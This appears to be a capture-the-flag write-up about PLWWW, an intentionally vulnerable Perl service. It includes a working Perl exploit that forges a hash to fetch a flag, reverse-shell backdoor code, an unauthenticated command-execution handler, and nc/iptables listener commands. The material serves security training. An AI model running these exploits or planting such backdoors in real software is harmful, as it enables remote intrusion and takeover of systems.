plwww (24.03) MEPHI (PHDays)
- 2. PLWWW: what it is and how to approach it
A [two words garbled in the source] service of a research laboratory.
The service is driven over HTTP, but it supports only two methods, GET and ADMIN. GET serves only to retrieve information; ADMIN gives access to the service's control panel. After start-up the service listens on port 8080.
On the file system the service is a single script written in Perl. The script is not obfuscated, but its structure and the methods it uses are misleading at first sight. This is intentional. The legend explains this style of development by the script having been written in a hurry by programmers of various galactic races.
- 3. PLWWW: what it is and how to approach it (192.168.X.2:8080)
4 states
#1 an error in hash generation
#2 a weak administrator password (trivial)
#3 a backdoor (odd: where did it come from?)
#4 RCE (obvious, but only at first sight)
- 5. PLWWW #1 (192.168.X.2:8080)
Operating principle of the service
The tToSystem function
(the peculiarity of this function is that it replaces every Latin vowel present in the request with characters from another set: Latin consonants plus other characters)
GET method: function kh8ploegjst
- 6. PLWWW #1 - cryptFn (192.168.X.2:8080)
kh8ploegjst -> cryptFn
sub cryptFn (&@) {
    # list assignment: @enc slurps every remaining argument, so $len is never set
    my($tXt,@enc,$len)=@_;
    my $jk;
    my $encK="";
    # string comparison ("le") against the unset $len: "0" le "" is false, this loop never runs
    for ($jk=0;$jk le $len;$jk++) {
        $encK .= $enc[$jk];
    }
    # numeric comparison: undef counts as 0, so exactly one key character ($enc[0]) is appended
    for ($jk=0;$jk <= $len;$jk++) {
        $encK .= $enc[$jk];
    }
    my $value=md5_hex("$tXt$encK");
    return $value;
}
- 7. PLWWW #1 - cryptFn (192.168.X.2:8080)
INPUT: cryptFn(record_1,split(//,XXSSDDFDS),scalar(split(//,$_)))
OUTPUT: md5_hex("record_1X")
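To make the hash bug concrete, here is an added example (not code from the slides or from the PLWWW service) that places the slide's cryptFn beside a corrected version and compares both on two keys; the record name and the key XXSSDDFDS are the slide's, while the second key XQWERTYUI and the minimum-length check in the corrected sub are constructed for this example. It shows that the vulnerable digest equals md5_hex("record_1X") and does not move when everything after the first key character changes, while the corrected one does.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use Digest::MD5 'md5_hex';

# Vulnerable form from the slides (the (&@) prototype is left out so the sub can
# be called normally). @enc swallows every remaining argument, so $len is never
# assigned: "0" le "" is false and the first loop never runs, while 0 <= undef
# is true exactly once, so only $enc[0] is mixed into the digest. With
# "use warnings" Perl reports "Use of uninitialized value $len" on each call,
# which is the cheapest way to catch this class of bug.
sub cryptFn_vuln {
    my ($tXt, @enc, $len) = @_;
    my $encK = "";
    for (my $jk = 0; $jk le $len; $jk++) { $encK .= $enc[$jk]; }
    for (my $jk = 0; $jk <= $len; $jk++) { $encK .= $enc[$jk]; }
    return md5_hex("$tXt$encK");
}

# Corrected form: the key travels as one array reference, its length is taken
# from the key itself rather than from a caller-supplied count, and a minimum
# length is enforced (the value 8 is a policy constructed for this example).
sub cryptFn_fixed {
    my ($tXt, $enc) = @_;
    die "key must be an array reference\n" unless ref($enc) eq 'ARRAY';
    die "key too short\n" if @$enc < 8;
    return md5_hex($tXt . join('', @$enc));
}

# Constructed inputs: the slide's record name and key, plus a second key that
# shares only its first character with it.
my $record = 'record_1';
my @key    = split //, 'XXSSDDFDS';
my @other  = split //, 'XQWERTYUI';

my $v1 = cryptFn_vuln($record, @key,   scalar @key);
my $v2 = cryptFn_vuln($record, @other, scalar @other);
print "vulnerable : $v1\n";
print "  equals md5_hex('record_1X') : ", ($v1 eq md5_hex("${record}X") ? 'yes' : 'no'), "\n";
print "  differs for the second key  : ", ($v1 eq $v2 ? 'no' : 'yes'), "\n";

my $f1 = cryptFn_fixed($record, \@key);
my $f2 = cryptFn_fixed($record, \@other);
print "fixed      : $f1\n";
print "  differs for the second key  : ", ($f1 eq $f2 ? 'no' : 'yes'), "\n";
```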
- 8. PLWWW #1 - exploit (192.168.X.2:8080)
For the function kh8ploegjst it is enough to pass "0" as the directory-name length to break out into the root.
To obtain a valid hash for the file YOURFLAG.TXT it is enough to know the first character of the secret key.
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use Digest::MD5 'md5_hex';
# only the first character of the secret key enters the hash, so 26 candidates suffice
my @crypto=('a'..'z');
my $fileName="YOURFLAG.TXT";
my $ua=LWP::UserAgent->new();
foreach my $sym (@crypto) {
    # as on the slide: overrides the loop variable on every iteration, so only "d" is ever
    # tried (apparently left over from a test run)
    $sym="d";
    my $value=md5_hex("$fileName$sym");
    print "$sym $value\n";
    # the leading "0" is the directory-name length that drops kh8ploegjst into the root
    my $br=$ua->get("http://192.168.1.2:8080/0$value");
    print $br->content;
    if ($br->content=~/FLAG/) {
        print $br->content;
        exit();
    }
}
- 10. PLWWW #3 (192.168.X.2:8080)
A change of the service's state brings, besides patches, a small backdoor into the code. The backdoor is unusual behaviour of the service: when it is addressed with a specially crafted request, the service opens a back-connect to the IP address given in the request and hands over a command line.
sub pm_backton (&@) {
    use IO::Socket; use Socket; use FileHandle;
    my($h0st)=@_;
    $h0st=~s/d/./gi;                    # every "d" in the supplied host string becomes a dot
    my $tm='/bin/sh';
    my $p0rt=int(rand(20000))+10000;    # random port in 10000..29999
    socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
    connect(SOCKET, sockaddr_in($p0rt, inet_aton($h0st)));
    SOCKET->autoflush();
    open(STDIN, ">&SOCKET");            # stdin/stdout/stderr are redirected to the socket
    open(STDOUT,">&SOCKET");
    open(STDERR,">&SOCKET");
    system($tm);                        # and the connection gets a shell
}
- 11. PLWWW #3 (192.168.X.2:8080)
ADMIN method: function kh8p1oegjst
sub kh8p1oegjst (&@) {
    my($query,$enc_key)=@_;
    my $status="";
    my $aPass="dfknmsdxz83945023489532";   # default password, replaced by the PASSWORD line of the config file
    open(FE,"configuration");
    while (my $e=<FE>) {chomp($e);if ($e=~/PASSWORD/) {$e=~s/PASSWORD //gi;$aPass=$e;}}
    close(FE);
    # marker 1: password-checked entry to the admin page
    if ($query=~/klrbxtzkljsbrklpjsfxljsspzkssndklrd/) {
        my(@Fghj)=split(/klrbxtzkljsbrklpjsfxljsspzkssndklrd/,$query);
        if ($aPass eq $Fghj[1]) {
            $status=&aPage;
        }
    # marker 2: whatever follows the marker is executed in backticks with no check at all (RCE)
    } elsif ($query=~/klrbxczklisbrklpjsfxljsspzkssndklrd/) {
        my(@Fghj)=split(/klrbxczklisbrklpjsfxljsspzkssndklrd/,$query);
        $status=`$Fghj[1]`;
    }
    # marker 3: the rest of the query is handed to pm_backton as the back-connect host
    if ($query=~/bzkckdklklr/) {$query=~s/bzkckdklklr//gi;&pm_backton($query);}
    return $status;
}
- 12. PLWWW #3 exploit (192.168.X.2:8080)
iptables -t nat -A OUTPUT -p tcp --dport 10000:30000 -j REDIRECT --to-ports 31337
nc -l -p 31337